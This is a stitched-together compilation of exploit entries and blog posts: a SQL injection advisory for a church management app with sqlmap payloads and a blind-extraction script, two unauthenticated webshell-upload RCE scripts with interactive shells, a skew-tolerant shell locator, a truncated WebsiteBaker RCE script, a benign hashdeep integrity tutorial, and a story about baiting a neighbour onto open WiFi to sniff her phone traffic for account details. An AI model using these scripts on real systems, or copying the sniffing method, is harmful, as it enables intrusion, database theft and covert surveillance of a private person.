# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip
# Vendor: oretnom23
# Version: v1.0
# Tested on: Linux, Apache, Mysql
# Exploit Description:
Church Management System 1.0 suffers from an unauthenticated SQL Injection vulnerability in the 'search' parameter, allowing remote attackers to dump the SQL database.

# Vulnerable Code
In search.php on line 28
$count_all = $conn->query("SELECT b.*,concat(u.firstname,' ',u.lastname) as author FROM `blogs` b inner join `users` u on b.author_id = u.id where b.`status` =1 and (b.`title` LIKE '%{$_GET['search']}%' OR b.`meta_description` LIKE '%{$_GET['search']}%' OR b.`keywords` LIKE '%{$_GET['search']}%' OR b.`content` LIKE '%{$_GET['search']}%' )")->num_rows;

Sqlmap command:
sqlmap -u 'http://localhost/church_management/?p=search&search=abcsw' -p search --level=5 --risk=3 --dbs --random-agent --eta --batch

Output:
---
Parameter: search (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: p=search&search=abcsw') OR NOT 4306=4306-- rFTu

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=search&search=abcsw') AND (SELECT 7513 FROM (SELECT(SLEEP(5)))SsaK)-- zpac

Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: p=search&search=abcsw') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x456e6d5461414774466e62636744424f786d74596e6270647a7063425669697970744a5351707970,0x7178787671),NULL,NULL,NULL,NULL-- -
---
[17:33:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.46, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:33:38] [INFO] fetching database names
available databases [4]:
[*] church_db
[*] information_schema
[*] mysql
[*] performance_schema
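The PHP line quoted above concatenates $_GET['search'] straight into four LIKE clauses, which is why sqlmap's "abcsw') OR ..." payloads work. The following is an added example, my own code and not from the project or from either advisory, that ports that query to an in-memory SQLite database, shows the true and false forms of the boolean payload and the parameterised fix, and then uses the page as a boolean oracle to extract the admin password hash by bisection over character codes. That is the same extraction the Library Management System script earlier on this page performs with SLEEP(1) and a linear scan of 64 candidates per character; only the oracle differs, and bisection needs about seven requests per character instead of up to 64. The schema, rows and password value are constructed for the example, and SQLite spells concat() as || and ORD(SUBSTRING()) as unicode(substr()).

```python
import sqlite3
from typing import Callable


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for church_db: the blogs/users pair that search.php joins.
    The admin password is a sample MD5 chosen for this example."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, firstname TEXT, lastname TEXT,
                            username TEXT, password TEXT);
        CREATE TABLE blogs (id INTEGER PRIMARY KEY, author_id INTEGER, status INTEGER,
                            title TEXT, meta_description TEXT, keywords TEXT, content TEXT);
        INSERT INTO users VALUES (1, 'Church', 'Admin', 'admin', '0192023a7bbd73250516f069df18b500');
        INSERT INTO blogs VALUES (1, 1, 1, 'Sunday service', 'weekly', 'worship', 'Join us at 10am');
        INSERT INTO blogs VALUES (2, 1, 1, 'Choir practice', 'music', 'choir', 'Thursday evenings');
    """)
    return conn


def vulnerable_search(conn: sqlite3.Connection, search: str) -> list:
    """search.php line 28 as written: $_GET['search'] spliced into the SQL string
    (ported to SQLite, so || replaces MySQL's concat())."""
    sql = ("SELECT b.*, u.firstname || ' ' || u.lastname AS author FROM blogs b "
           "INNER JOIN users u ON b.author_id = u.id WHERE b.status = 1 AND ("
           f"b.title LIKE '%{search}%' OR b.meta_description LIKE '%{search}%' "
           f"OR b.keywords LIKE '%{search}%' OR b.content LIKE '%{search}%')")
    return conn.execute(sql).fetchall()


def safe_search(conn: sqlite3.Connection, search: str) -> list:
    """The fix: the same query with bound parameters, so the input is only ever a value."""
    sql = ("SELECT b.*, u.firstname || ' ' || u.lastname AS author FROM blogs b "
           "INNER JOIN users u ON b.author_id = u.id WHERE b.status = 1 AND ("
           "b.title LIKE ? OR b.meta_description LIKE ? OR b.keywords LIKE ? OR b.content LIKE ?)")
    pattern = f"%{search}%"
    return conn.execute(sql, (pattern,) * 4).fetchall()


def bisect_int(oracle: Callable[[int], bool], lo: int, hi: int) -> int:
    """Locate v in [lo, hi] when all you can ask is oracle(m) == (v > m):
    about log2(hi - lo) questions instead of one per candidate value."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


class BlindExtractor:
    """Boolean-blind extraction through the search page.  For a time-based sink such as
    the Library Management exploit only ask() changes: inject IF(cond,SLEEP(n),0) and
    treat 'response took longer than n seconds' as True instead of 'rows came back'."""

    def __init__(self, conn: sqlite3.Connection):
        self.conn = conn
        self.requests = 0

    def ask(self, cond: str) -> bool:
        self.requests += 1
        # 'x' matches no post, so the page shows results only when cond is true.
        # Closing the LIKE quote and the open paren mirrors sqlmap's "abcsw') OR ..." payload.
        return len(vulnerable_search(self.conn, f"x') OR ({cond})-- -")) > 0

    def extract(self, subquery: str, max_len: int = 64) -> str:
        length = bisect_int(lambda m: self.ask(f"length(({subquery})) > {m}"), 0, max_len)
        out = ""
        for pos in range(1, length + 1):
            # MySQL: ORD(SUBSTRING(...)); SQLite spells it unicode(substr(...)).
            code = bisect_int(
                lambda m: self.ask(f"unicode(substr(({subquery}),{pos},1)) > {m}"), 32, 126)
            out += chr(code)
        return out


if __name__ == "__main__":
    db = make_db()
    print("true/false rows:", len(vulnerable_search(db, "abcsw') OR NOT 4306=4307-- rFTu")),
          len(vulnerable_search(db, "abcsw') OR NOT 4306=4306-- rFTu")))
    ex = BlindExtractor(db)
    print(ex.extract("SELECT password FROM users WHERE id=1"), "in", ex.requests, "requests")
    print("parameterised:", safe_search(db, "abcsw') OR NOT 4306=4307-- rFTu"))
```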
            

A few street lamps are still lit and the night is deep. I walk along an unfamiliar back street, grumbling about the gloom work brings, looking at my thin wallet and the uncertain road ahead, and fall into thought. Today was another day of overtime: a new project is about to launch, bugs keep surfacing one after another, and so I have worked late yet again. By this hour most people are probably asleep.

I reached the building where I rent. It is a small two-storey house: the landlord lives downstairs and there are two rooms upstairs. The other room had been lived in by the landlord's child, who moved out after graduating. The second floor has a small terrace, which is why I rented the place: sitting out there on a summer night and looking up at the stars is beautiful.

As soon as I got upstairs I noticed the light next door was on. At this hour? Where had this person come from? Probably a new tenant. I did not pay it any attention and, worn out from the day, went straight to bed.

I normally wake up late, but today I woke up especially early, because I seemed to hear a woman's voice in my dream, a warm, magnetic voice. For a single guy like me that is a rare thing! Being introverted and shy, I still have no girlfriend, and now I seemed to see spring arriving.

On my way to work I ran into the landlord and mentioned it in passing. From the landlord I learned that she had moved in only yesterday and seemed to work in a government office. For me this was a once-in-a-lifetime opportunity, and a new plan lingered in my mind all day. Pictures attached; let the daydreaming begin.

Information Collection

Target: collect the neighbour's QQ number, *bao account, phone number, WeChat ID and other related information.

Casting a brick to attract jade

How do you obtain that kind of information about a target? Some would say it is simple: just ask. But for introverts like us that is an insurmountable hurdle.

So what can be done? 5G may be here, but with mobile data still expensive, working people are happy to use any WiFi they can find. She had only just moved in, and the first thing a new tenant does is look for usable WiFi.

So I turned on the router's guest network with no encryption, so that she would take the bait quickly. Some people are wary of free hotspots; in that case set an encrypted WiFi instead and let the password circulate through WiFi Master Key.

Lying in wait

With the plan under way I left work early every day, hoping to get useful information as soon as possible. Finally, heaven rewards the diligent: an unfamiliar device came online.

An OPPO-Reno6-Pro-5G had quietly joined the network.

Unexpected

Since it was evening the phone was certainly in use, so I captured its traffic on the router:

tcpdump -i br0 host 192.168.123.90 -w 14235.cap

After waiting a while, analyse the captured packets: download the capture file and open it in Wireshark.

Find QQ

Press Ctrl+F and search for the hex bytes 00 00 00 0d.

Confirm the number

Phone number

A certain *bao

WeChat

At this point the basic information has been collected. What follows is a long road.

(Ten thousand words omitted here.)

Declaration

The above is experimental data only; please do not take it seriously. Do not attack others illegally or maliciously, and do not put any of this to illegal use.

# Exploit Title: Online Food Ordering System 2.0 -  Remote Code Execution (RCE) (Unauthenticated)
# Exploit Author: Abdullah Khawaja (hax.3xploit)
# Date: 2021-09-20
# Vendor Homepage: https://www.sourcecodester.com/php/14951/online-food-ordering-system-php-and-sqlite-database-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online_ordering.zip
# Version: 2.0
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
# Description: Online Food Ordering System 2.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.

# Exploit Details:

# 1. Access 'admin/ajax.php'; it does not check for an authenticated user session.
# 2. Set the 'action' parameter of the POST request to 'save_settings'.
#     - `ajax.php?action=save_settings`
# 3. Capture the request in Burp and replace it with the following request.

'''    
POST /fos/admin/ajax.php?action=save_settings HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------120025571041714278883588636251
Content-Length: 754
Origin: http://localhost
Connection: close
Referer: http://localhost/fos/admin/index.php?page=site_settings
Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------120025571041714278883588636251
Content-Disposition: form-data; name="name"

adsa
-----------------------------120025571041714278883588636251
Content-Disposition: form-data; name="email"

asdsad@asda.com
-----------------------------120025571041714278883588636251
Content-Disposition: form-data; name="contact"

asdsad
-----------------------------120025571041714278883588636251
Content-Disposition: form-data; name="about"

asdsad
-----------------------------120025571041714278883588636251
Content-Disposition: form-data; name="img"; filename="phpinfo.php"
Content-Type: application/octet-stream

<?php echo phpinfo();?>
-----------------------------120025571041714278883588636251--
'''
#   The image uploader renames the uploaded file with the following expression:
#       strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
#   i.e. the server's current time to the minute, an underscore, and the original file name.
#   You can evaluate it on any online PHP sandbox, e.g. https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler
#   with <?php echo strtotime(date('y-m-d H:i')); ?>  Output: 1632085200
#   and prepend the output to your payload name, e.g. 1632085200_phpinfo.php
# 4. Communicate with the webshell at '/assets/img/1632085200_phpinfo.php?cmd=dir' using GET requests.

# RCE via executing exploit:
    # Step 1: run the exploit in python with this command: python3 OFOS_v2.0.py
    # Step 2: Input the URL of the vulnerable application: Example: http://localhost/fos/


import requests, sys, re
import datetime
from colorama import Fore, Back, Style

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)





header = Style.BRIGHT+Fore.RED+'              '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL

print(Style.BRIGHT+"               Online Food Ordering System v2.0")
print(Style.BRIGHT+"            Unauthenticated Remote Code Execution"+Style.RESET_ALL)
print(header)

print(r"""
        ______ _______                         ________        
        ___  //_/__  /_______ ___      _______ ______(_)_____ _
        __  ,<  __  __ \  __ `/_ | /| / /  __ `/____  /_  __ `/
        _  /| | _  / / / /_/ /__ |/ |/ // /_/ /____  / / /_/ / 
        /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___  /  \__,_/  
                                               /___/           
                    abdullahkhawaja.com
            """)



GREEN =  '\033[32m' # Green Text
RED =  '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults

#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}


#Create a new session
s = requests.Session() 


#Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}

LINK=input("Enter URL of The Vulnerable Application : ").strip()


def webshell(LINK, session):
    try:
        WEB_SHELL = LINK.rstrip('/')+'/assets/img/'+filename
        getdir  = {'cmd': 'echo %CD%'}   # Windows: prints the working directory; a Linux target echoes %CD% literally
        r2 = session.get(WEB_SHELL, params=getdir, verify=False)
        status = r2.status_code
        if status != 200:
            print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
            r2.raise_for_status()
        print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
        cwd = re.findall('[CDEF].*', r2.text)          # drive-letter path on Windows targets
        cwd = (cwd[0] if cwd else 'shell')+"> "        # plain prompt when there is no drive path to show
        term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
        while True:
            thought = input(term)
            command = {'cmd': thought}
            r2 = session.get(WEB_SHELL, params=command, verify=False)
            status = r2.status_code
            if status != 200:
                r2.raise_for_status()
            response2 = r2.text
            print(response2)
    except (requests.RequestException, KeyboardInterrupt, EOFError):
        print("\r\nExiting.")
        sys.exit(-1)


#Creating a PHP Web Shell

phpshell  = {
               'img': 
                  (
                   'shell.php', 
                   '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 
                   'application/octet-stream', 
                  {'Content-Disposition': 'form-data'}
                  ) 
             }

# Defining value for form data
data = {'name':'test', 'email':'info@sample.com', 'contact':'+6948 8542 623','about':'hello world'}


def id_generator():
    x = datetime.datetime.now()
    date_string = x.strftime("%y-%m-%d %H:%M")
    date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M")
    timestamp = datetime.datetime.timestamp(date)
    file = int(timestamp)
    final_name = str(file)+'_shell.php'
    return final_name

filename = id_generator()
#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK.rstrip('/')+'/admin/ajax.php?action=save_settings', cookies=cookies, files=phpshell, data=data)

shell_upload = True if("1" in upload.text) else False
u=shell_upload
if u:
	print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
else:
	print(RED+"[-]Failed To Upload The PHP Shell!", RESET)



#Executing The Webshell
webshell(LINK, s)
            
# Exploit Title: Budget and Expense Tracker System 1.0 -  Remote Code Execution (RCE) (Unauthenticated)
# Exploit Author: Abdullah Khawaja (hax.3xploit)
# Date: 2021-09-21
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
# Version: 1.0
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
# Description: Budget and Expense Tracker System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.



# RCE via executing exploit:
    # Step 1: run the exploit in python with this command: python3 BMAETS_v1.0.py
    # Step 2: Input the URL of the vulnerable application: Example: http://localhost/expense_budget/


import requests, sys, re
import datetime
from colorama import Fore, Back, Style

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)





header = Style.BRIGHT+Fore.RED+'              '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL

print(Style.BRIGHT+"               Budget and Expense Tracker System 1.0")
print(Style.BRIGHT+"            Unauthenticated Remote Code Execution"+Style.RESET_ALL)
print(header)

print(r"""
        ______ _______                         ________        
        ___  //_/__  /_______ ___      _______ ______(_)_____ _
        __  ,<  __  __ \  __ `/_ | /| / /  __ `/____  /_  __ `/
        _  /| | _  / / / /_/ /__ |/ |/ // /_/ /____  / / /_/ / 
        /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___  /  \__,_/  
                                               /___/           
                    abdullahkhawaja.com
            """)



GREEN =  '\033[32m' # Green Text
RED =  '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults

# Set to {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} to inspect traffic in Burp;
# left as None so the script does not fail when nothing is listening on 8080.
proxies = None


#Create a new session
s = requests.Session() 


#Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}

LINK=input("Enter URL of The Vulnerable Application : ").strip()


def webshell(LINK, session):
    try:
        WEB_SHELL = LINK.rstrip('/')+'/uploads/'+filename
        getdir  = {'cmd': 'echo %CD%'}   # Windows: prints the working directory; a Linux target echoes %CD% literally
        r2 = session.get(WEB_SHELL, params=getdir, verify=False, proxies=proxies)
        status = r2.status_code
        if status != 200:
            print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
            r2.raise_for_status()
        print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
        cwd = re.findall('[CDEF].*', r2.text)          # drive-letter path on Windows targets
        cwd = (cwd[0] if cwd else 'shell')+"> "        # plain prompt when there is no drive path to show
        term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
        while True:
            thought = input(term)
            command = {'cmd': thought}
            r2 = session.get(WEB_SHELL, params=command, verify=False, proxies=proxies)
            status = r2.status_code
            if status != 200:
                r2.raise_for_status()
            response2 = r2.text
            print(response2)
    except (requests.RequestException, KeyboardInterrupt, EOFError):
        print("\r\nExiting.")
        sys.exit(-1)


#Creating a PHP Web Shell

phpshell  = {
               'img': 
                  (
                   'shell.php', 
                   '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 
                   'application/octet-stream', 
                  {'Content-Disposition': 'form-data'}
                  ) 
             }

# Defining value for form data
data = {'name':'Budget and Expense Tracker System - PHP', 'short_name':'B&E Tracker'}


def id_generator():
    x = datetime.datetime.now()
    date_string = x.strftime("%y-%m-%d %H:%M")
    date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M")
    timestamp = datetime.datetime.timestamp(date)
    file = int(timestamp)
    final_name = str(file)+'_shell.php'
    return final_name

filename = id_generator()
#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK.rstrip('/')+'/classes/SystemSettings.php?f=update_settings', cookies=cookies, files=phpshell, data=data,  proxies=proxies)

shell_upload = True if("1" in upload.text) else False
u=shell_upload
if u:
	print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
else:
	print(RED+"[-]Failed To Upload The PHP Shell!", RESET)



#Executing The Webshell
webshell(LINK, s)
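Both scripts above (Online Food Ordering System and Budget and Expense Tracker System) guess the stored filename once, from the attacker's clock, before the upload goes out. The guess is wrong whenever the target's clock is skewed by a minute or the upload straddles a minute boundary, and the shell is then reported as unreachable although it is on disk under a neighbouring timestamp. The following is an added example, my own code and not the exploit author's, that generates the candidate names around the upload time and probes them in order of likelihood. The probe function is injected so the example runs offline; in practice it is a GET against /assets/img/ or /uploads/. It assumes, as the exploits do, that PHP reads the two-digit 'y-m-d' as year-month-day, which the value 1632085200 reported above confirms for the author's setup.

```python
from typing import Callable, Iterable, List, Optional


def php_minute_stamp(epoch: float) -> int:
    """What strtotime(date('y-m-d H:i')) yields on the server: the current time with
    the seconds dropped.  Truncating to the minute gives the same epoch in any timezone
    whose UTC offset is a whole number of minutes, so the server's timezone is irrelevant."""
    return int(epoch) // 60 * 60


def candidate_names(upload_epoch: float, original_name: str, skew_minutes: int = 2) -> List[str]:
    """Filenames the server may have chosen, most likely first: the local minute, then
    +1/-1, +2/-2 ... minutes, covering clock skew between attacker and target and an
    upload that crosses a minute boundary.  Both break the scripts' single guess."""
    base = php_minute_stamp(upload_epoch)
    offsets = [0] + [sign * k for k in range(1, skew_minutes + 1) for sign in (1, -1)]
    return [f"{base + 60 * off}_{original_name}" for off in offsets]


def find_uploaded(probe: Callable[[str], int], names: Iterable[str]) -> Optional[str]:
    """First candidate the server answers 200 for.  probe(name) -> HTTP status code is
    injected (an HTTP GET to the upload directory in practice) so this runs offline."""
    for name in names:
        if probe(name) == 200:
            return name
    return None


if __name__ == "__main__":
    import time
    # Constructed probe: pretend the target's clock was one minute ahead of ours.
    now = time.time()
    on_server = {f"{php_minute_stamp(now) + 60}_shell.php"}
    found = find_uploaded(lambda n: 200 if n in on_server else 404,
                          candidate_names(now, "shell.php"))
    print("shell stored as", found)
```

Record the upload time immediately before sending the POST, and widen skew_minutes rather than re-uploading if nothing answers: every retry leaves another shell on the target.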
            

When we download files from the Internet, the author will sometimes publish the file's MD5 value so that users can compare it against their download. If the MD5 of the file you downloaded does not match the one the author provided, the file has been modified by someone else; if it is a program, someone may have added a malicious backdoor.

hashdeep computes multiple hashes (message digests) for any number of files and can optionally recurse through a directory tree. By default it computes MD5 and SHA-256, equivalent to -c md5,sha256. It can also audit a set of files against a known list of hashes. Errors are reported on standard error. If no files are specified, it reads from standard input.

Usage

hashdeep <filename>

After modifying the file, look at the hashes again. The MD5,SHA-256 pair changes from

b29d0b8948ed59333490babc1f85442b,040e81279652e493b4ab629446bda08181125a61fbec94997187dc892844a239

to

02fd2f0ba1c6d6911c9b7eb7c443629b,c2912e30e8eb731c0373d83af1046ca21d79acc452bb1a986844b26424d93b69

Other parameters

-c: mode. Compute the hashes with the specified algorithms; md5, sha1, sha256, tiger and whirlpool are supported.

-r: recursive mode. Walk every subdirectory. Note that recursive mode cannot be used to examine all files of a given extension: hashdeep -r *.txt examines all files inside directories whose names end in .txt.

-v: verbose mode. Repeat it to make the program more verbose.
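The audit feature mentioned above is what turns a one-off hash comparison into integrity monitoring: record a known-good listing, then later classify every file as unchanged, modified, new or missing. The following is an added example, my own code and not part of the hashdeep project, that does this in Python: it writes a listing in hashdeep's own file format (the %%%% header lines followed by size,md5,sha256,filename records), parses such a listing back, and audits a directory tree against it the way hashdeep -a -k known.txt -r does. The sample tree is constructed in the usage test; the functions accept any directory.

```python
import hashlib
from pathlib import Path
from typing import Dict, Iterator, List, Tuple

ALGOS = ("md5", "sha256")  # hashdeep's default set, the same as -c md5,sha256

Digest = Tuple[int, str, str]  # (size, md5, sha256): the columns hashdeep prints


def hash_file(path: Path) -> Digest:
    """Size plus both digests, streamed in 64 KiB chunks so large files are never read whole."""
    hashers = {a: hashlib.new(a) for a in ALGOS}
    size = 0
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            size += len(chunk)
            for h in hashers.values():
                h.update(chunk)
    return size, hashers["md5"].hexdigest(), hashers["sha256"].hexdigest()


def walk(root: Path) -> Iterator[Tuple[str, Path]]:
    """Every regular file under root (hashdeep -r), keyed by its relative POSIX path."""
    root = Path(root)
    files = [(p.relative_to(root).as_posix(), p) for p in root.rglob("*") if p.is_file()]
    return iter(sorted(files))


def hashdeep_listing(root: Path) -> str:
    """Recursive listing in hashdeep's file format: two '%%%%' header lines, '##' comment
    lines, then one 'size,md5,sha256,filename' record per file.  Saved to disk it is the
    known-hash list for a later audit (hashdeep -l writes relative paths like these)."""
    lines = ["%%%% HASHDEEP-1.0", "%%%% size,md5,sha256,filename", f"## Invoked from: {root}"]
    for name, p in walk(root):
        size, md5, sha = hash_file(p)
        lines.append(f"{size},{md5},{sha},{name}")
    return "\n".join(lines) + "\n"


def parse_hashdeep(text: str) -> Dict[str, Digest]:
    """Parse a listing (ours, or real hashdeep output) into {filename: (size, md5, sha256)}."""
    known: Dict[str, Digest] = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith(("%%%%", "##")):
            continue
        size, md5, sha, name = line.split(",", 3)  # split 3 times only: a filename may contain commas
        known[name] = (int(size), md5, sha)
    return known


def audit(root: Path, known: Dict[str, Digest]) -> Dict[str, List[str]]:
    """What hashdeep -a -k known.txt -r reports: each file is matched, changed (same name,
    different size or digest), new (absent from the list) or missing (listed, not on disk)."""
    report: Dict[str, List[str]] = {"matched": [], "changed": [], "new": [], "missing": []}
    seen = set()
    for name, p in walk(root):
        seen.add(name)
        if name not in known:
            report["new"].append(name)
        elif hash_file(p) == known[name]:
            report["matched"].append(name)
        else:
            report["changed"].append(name)
    report["missing"] = sorted(set(known) - seen)
    return report


if __name__ == "__main__":
    import sys
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else Path(".")
    listing = hashdeep_listing(target)
    print(listing)
    print(audit(target, parse_hashdeep(listing)))
```

A listing produced by the real tool with hashdeep -r -l <dir> parses the same way, so a baseline taken with hashdeep can be re-checked here, and the other way round.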

# Exploit Title: WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 18-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://websitebaker.org/
# Software Link: http://wiki.websitebaker.org/doku.php/en/downloads
# Version: 2.13.0
# Category: Webapps
# Tested on: Linux/Windows

# WebsiteBaker Open Source Content Management
# Includes an endpoint that allows remote access
# Language page misconfigured, causing vulnerability
# User information with sufficient permissions is required.
# I had to write a long script to bypass some security measures.

# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
#		   python3 exploit.py -h


from bs4 import BeautifulSoup
from time import sleep
import requests
import argparse


def main():
	parser = argparse.ArgumentParser(
		description='WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)'
	)
	parser.add_argument('-u', '--host', type=str, required=True)
	parser.add_argument('-l', '--login', type=str, required=True)
	parser.add_argument('-p', '--password', type=str, required=True)
	args = parser.parse_args()
	print("\nWebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)",
		  "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
	sleep(2)
	find_default(args)



def find_default(args):
	# Normalise the target: default to http:// and drop a trailing slash
	if args.host.startswith(('http://', 'https://')):
		print("[?] Check Url...\n")
	else:
		print("\n[?] Check Address...\n")
		args.host = "http://" + args.host
	if args.host.endswith('/'):
		args.host = args.host[:-1]
	sleep(2)


	# Check Host Status
	try:
		response = requests.get(args.host)
		if response.status_code != 200:
			print("[-] Address not reachable!\n")
			sleep(2)
			exit(1)

	except requests.ConnectionError as exception:
		print("[-] Address not reachable!\n")
		sleep(2)
		exit(1)

	# A shell left by an earlier run is reused as-is; exploit() returns if none is present
	exploit(args)

	url = args.host + "/admin/login/index.php"
	headers = {
		"Upgrade-Insecure-Requests": "1",
		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
		"Referer": args.host + "/admin/addons/index.php",
		"Accept-Encoding": "gzip, deflate",
		"Accept-Language": "en-US,en;q=0.9",
		"Connection": "close"
	}
	response = requests.get(url, headers=headers)
	# The session cookie name is configurable, so take it from the response
	phpsessid_name = None
	for cookie in response.cookies:
		phpsessid_name = cookie.name
	if phpsessid_name is None:
		print("[-] No session cookie received, is this WebsiteBaker?\n")
		exit(1)

	# The login form carries the real username/password field names and a form
	# token in hidden inputs; read them from the page instead of hard-coding them
	soup = BeautifulSoup(response.text, 'html.parser')
	hidden = soup.find_all("input", type="hidden")
	input_hidden_username = hidden[1].get("value")
	input_hidden_password = hidden[2].get("value")
	input_hidden_name = hidden[3].get("name")
	input_hidden_value = hidden[3].get("value")


	login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value)



def login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value):

	session = requests.session()

	url = args.host + "/admin/login/index.php"
	cookies = {
		"klaro": "{'klaro':true,'mathCaptcha':true}"
	}

	headers = {
		"Cache-Control": "max-age=0",
		"Upgrade-Insecure-Requests": "1",
		"Origin": args.host,
		"Content-Type": "application/x-www-form-urlencoded",
		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
		"Referer": args.host + "/admin/login/index.php",
		"Accept-Encoding": "gzip, deflate",
		"Accept-Language": "en-US,en;q=0.9", "Connection": "close"
	}

	data = {
		"url": '',
		"username_fieldname": input_hidden_username,
		"password_fieldname": input_hidden_password,
		input_hidden_name: input_hidden_value,
		input_hidden_username : args.login,
		input_hidden_password : args.password,
		"submit": ''
	}


	response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)
	new_cookie = (response.cookies.get(phpsessid_name))

	if response.headers.get("Location") == args.host + "/admin/start/index.php":
		print("[+] Success Login...\n")
		sleep(2)
		check_pers(args, phpsessid_name, new_cookie)
	else:
		print("[-] Login Failed...\n")
		print("Your username or password is incorrect.")
		sleep(2)


def check_pers(args, phpsessid_name, new_cookie):
	url = args.host + "/admin/languages/install.php"
	cookies = {
		"klaro": "{'klaro':true,'mathCaptcha':true}",
		phpsessid_name : new_cookie
	}
	headers = {
		"Cache-Control": "max-age=0",
		"Upgrade-Insecure-Requests": "1",
		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
		"Accept-Encoding": "gzip, deflate",
		"Accept-Language": "en-US,en;q=0.9",
		"Connection": "close"
	}
	response = requests.get(url, headers=headers, cookies=cookies)
	soup = BeautifulSoup(response.text, 'html.parser')

	# Only a user allowed to manage languages gets the Add-ons page here. The check
	# keys on the default site title ("Enter your website title"), so adjust it for
	# a target that has renamed its site.
	title = soup.find_all("title")[0].text
